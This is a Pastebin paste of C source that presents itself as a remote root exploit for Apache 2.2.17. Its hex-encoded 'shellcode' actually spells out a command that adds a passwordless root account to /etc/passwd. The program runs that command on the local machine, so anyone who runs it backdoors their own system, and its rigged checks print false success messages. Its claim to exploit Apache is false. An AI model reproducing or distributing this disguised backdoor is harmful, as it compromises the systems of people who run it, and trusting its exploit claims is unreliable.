SHARE
TWEET

Untitled

a guest Aug 18th, 2011 10,015 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/
  2. /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */
  3.  
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <string.h>
  7. #include <strings.h>
  8. #include <netdb.h>
  9. #include <unistd.h>
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <arpa/inet.h>
  14.  
  15. char evil[] =  
  16.                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
  17.                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
  18.                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
  19.                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
  20.                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
  21.                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
  22.                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
  23.                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
  24.                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
  25.                 "\x44\x44";
  26.  
  27. #define NOP     0x90
  28. #define BSIZE   1000
  29. #define OFFSET  400
  30. #define ADDR    0xbffff658
  31. #define ASIZE   2000
  32.  
  33. int
  34. main(int argc, char *argv[])
  35. {
  36.         char *buffer;
  37.         int s;
  38.         struct hostent *hp;
  39.         struct sockaddr_in sin;
  40.         if (argc != 2) {
  41.                 printf("%s <target>\n", argv[0]);
  42.                 exit(1);
  43.           }
  44.         buffer = (char *) malloc(BSIZE + ASIZE + 100);
  45.         if (buffer == NULL) {
  46.                 printf("Not enough memory\n");
  47.                 exit(1);
  48.           }
  49.         memcpy(&buffer[BSIZE - strlen(evil)], evil,
  50.                 strlen(evil));
  51.         buffer[BSIZE + ASIZE] = ';';
  52.         buffer[BSIZE + ASIZE + 1] = '\0';
  53.         hp = gethostbyname(argv[1]);
  54.         if (hp == NULL) {
  55.                 printf("no such server\n");
  56.                 exit(1);
  57.           }
  58.         bzero(&sin, sizeof(sin));
  59.         bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
  60.         sin.sin_family = AF_INET;
  61.         sin.sin_port = htons(80);
  62.         s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  63.         if (s < 0) {
  64.                 printf("Can't open socket\n");
  65.                 exit(1);
  66.           }
  67.         if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
  68.                 printf("Connection refused\n");
  69.                 exit(1);
  70.           }
  71.         printf("sending exploit code...\n");
  72.         if (send(s, buffer, strlen(buffer), 0) != 1)
  73.                 printf("exploit was successful!\n");
  74.           else
  75.                 printf("sorry, this site isn't vulnerable\n");
  76.         printf("waiting for shell.....\n");
  77.         if (fork() == 0)
  78.                 execl("/bin/sh", "sh", "-c", evil, 0);
  79.           else
  80.                 wait(NULL);
  81.         while (1) { /* shell */ }
  82. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top